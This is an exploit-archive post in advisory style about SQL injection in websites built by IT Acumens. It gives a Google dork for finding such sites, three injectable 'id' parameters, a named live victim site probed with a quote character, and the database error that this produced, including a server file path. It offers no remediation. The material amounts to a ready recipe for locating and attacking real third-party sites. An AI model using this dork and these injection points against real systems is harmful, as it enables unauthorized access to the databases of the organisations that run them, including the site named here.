facebook facebook twitter rss

Powered by IT Acumens Web Design Company SQL Injection

Author: KingSkrupellos , Published: 08-10-2018
# Exploit Title : Powered by IT Acumens Web Design Company SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : itacumens.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Powered by IT Acumens''

# SQL Injection Exploit :

/news/readnews.php?id=[SQL Injection]

/examschedule.php?id=[SQL Injection]

/news/eventsreadnews.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site => icfsjmhss.com/news/readnews.php?id=12%27 => [ Proof of Concept ] => archive.is/DoTko

# SQL Database Error =>

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/icfsjmhs/public_html/examschedule.php on line 485

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\' order by date LIMIT 10' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :